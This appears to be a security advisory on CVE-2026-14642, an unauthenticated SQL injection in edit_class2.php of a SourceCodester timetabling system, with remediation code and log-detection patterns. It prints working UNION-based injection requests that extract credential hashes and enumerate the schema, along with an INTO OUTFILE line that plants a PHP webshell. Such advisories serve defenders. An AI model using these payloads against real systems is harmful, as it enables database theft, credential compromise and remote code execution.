Executive Summary
CVE-2026-14642 is a high-severity SQL injection vulnerability in SourceCodester's Class and Exam Timetabling System 1.0, identical in class to its sibling CVE-2026-14641 but affecting a different file: edit_class2.php. The ID GET parameter is passed directly into a SQL query without sanitization, allowing any unauthenticated remote attacker to exfiltrate the full database. A public proof-of-concept exploit has been published.
CVSS Score: 7.3 (High)
Both CVE-2026-14641 and CVE-2026-14642 exist in the same application, indicating a systemic absence of parameterized queries throughout the codebase. All SourceCodester Timetabling System deployments should be treated as compromised until patched.
Vulnerability Overview
Root Cause
The edit_class2.php script directly interpolates the id GET parameter into a SQL query:
// Vulnerable pattern (simplified)
$id = $_GET['id'];
$query = "SELECT * FROM class WHERE id = $id";
$result = mysqli_query($conn, $query);This is the same root cause as CVE-2026-14641 — no input sanitization, no parameterized queries, and no authentication gate on the endpoint.
Attack Surface
| Component | Detail |
|---|---|
| Endpoint | GET /edit_class2.php?id=<payload> |
| Auth Required | None — fully unauthenticated |
| Injection Type | UNION-based and boolean-blind SQL injection |
| Database | MySQL |
| Impact | Full database dump, auth bypass, data manipulation |
| Public PoC | Yes — published alongside CVE-2026-14641 |
Relationship to CVE-2026-14641
These two CVEs were disclosed simultaneously and represent a pattern of insecure development across the SourceCodester timetabling application:
| CVE | File | Table Targeted |
|---|---|---|
| CVE-2026-14641 | edit_course.php | courses table |
| CVE-2026-14642 | edit_class2.php | class table |
Both are remotely exploitable without authentication. Operators should audit all GET/POST parameters across the application for the same pattern.
Attack Chain
1. Attacker scans for SourceCodester timetabling installations (Shodan/Fofa)
2. Sends crafted GET request to /edit_class2.php?id= with UNION payload
3. Application concatenates raw input into MySQL query
4. UNION SELECT retrieves usernames and password hashes from users table
5. Attacker performs offline hash cracking (MD5 without salt is common)
6. Admin session established — full application control
7. Possible pivot: file write via INTO OUTFILE if MySQL permissions allowTechnical Details
Manual SQL Injection
# Test for injection
GET /edit_class2.php?id=1'
# Response: MySQL syntax error confirms injection
# Column enumeration
GET /edit_class2.php?id=1 ORDER BY 10--
# Reduce until no error to determine column count
# Credential extraction
GET /edit_class2.php?id=-1 UNION SELECT 1,username,password,4 FROM users--
Database Schema Enumeration
# List all databases
GET /edit_class2.php?id=-1 UNION SELECT 1,schema_name,3,4
FROM information_schema.schemata--
# List tables in target DB
GET /edit_class2.php?id=-1 UNION SELECT 1,table_name,3,4
FROM information_schema.tables
WHERE table_schema=database()--
Potential for File Write (If MySQL Has FILE Privilege)
-- Write PHP webshell if MySQL user has FILE privilege
SELECT '<?php system($_GET["cmd"]); ?>'
INTO OUTFILE '/var/www/html/shell.php'This escalates SQL injection to full Remote Code Execution when the MySQL service account has elevated OS privileges.
Systemic Risk Assessment
SourceCodester applications are widely deployed by students, academic institutions, and small businesses in developing regions. The pattern of direct query interpolation appears in many of their free PHP scripts. The risks include:
| Risk | Detail |
|---|---|
| Student PII | Names, student IDs, schedules, enrollment data |
| Faculty Credentials | Email addresses, password hashes |
| Administrative Access | Full application takeover via credential theft |
| Lateral Movement | Shared hosting environments may expose other sites |
Remediation
Immediate: Parameterized Queries
// SECURE: Bind the id as an integer parameter
$stmt = $conn->prepare("SELECT * FROM class WHERE id = ?");
$stmt->bind_param("i", $_GET['id']);
$stmt->execute();
$result = $stmt->get_result();Require Authentication on Edit Endpoints
// Add session check at the top of edit_class2.php
session_start();
if (!isset($_SESSION['user_id'])) {
header('Location: login.php');
exit;
}Restrict MySQL File Privileges
-- Revoke FILE privilege from application DB user
REVOKE FILE ON *.* FROM 'appuser'@'localhost';
FLUSH PRIVILEGES;Full Application Audit
Given both CVE-2026-14641 and CVE-2026-14642 exist in the same application, assume the pattern is widespread. Run a full audit:
# Find all direct GET/POST parameter usage in SQL queries
grep -rn "\$_GET\|\$_POST\|\$_REQUEST" . --include="*.php" | \
grep -i "query\|sql\|mysqli_query\|mysql_query"Detection
Web Log Analysis
# Detect UNION-based injection attempts
grep -E "edit_class2\.php.*id=.*(UNION|SELECT|ORDER BY|--)" \
/var/log/nginx/access.log
# Detect error-based probing (single quote injection)
grep -E "edit_class2\.php.*id=.*%27" /var/log/nginx/access.logIndicators of Compromise
- Unexpected admin account creation in the
userstable - PHP files appearing in the web root not present in source control
- MySQL slow log showing
UNION SELECTpatterns - Access to
information_schematables from the application user
References
- NVD — CVE-2026-14642
- NVD — CVE-2026-14641 (Sibling Vulnerability)
- SourceCodester
- OWASP SQL Injection Prevention Cheat Sheet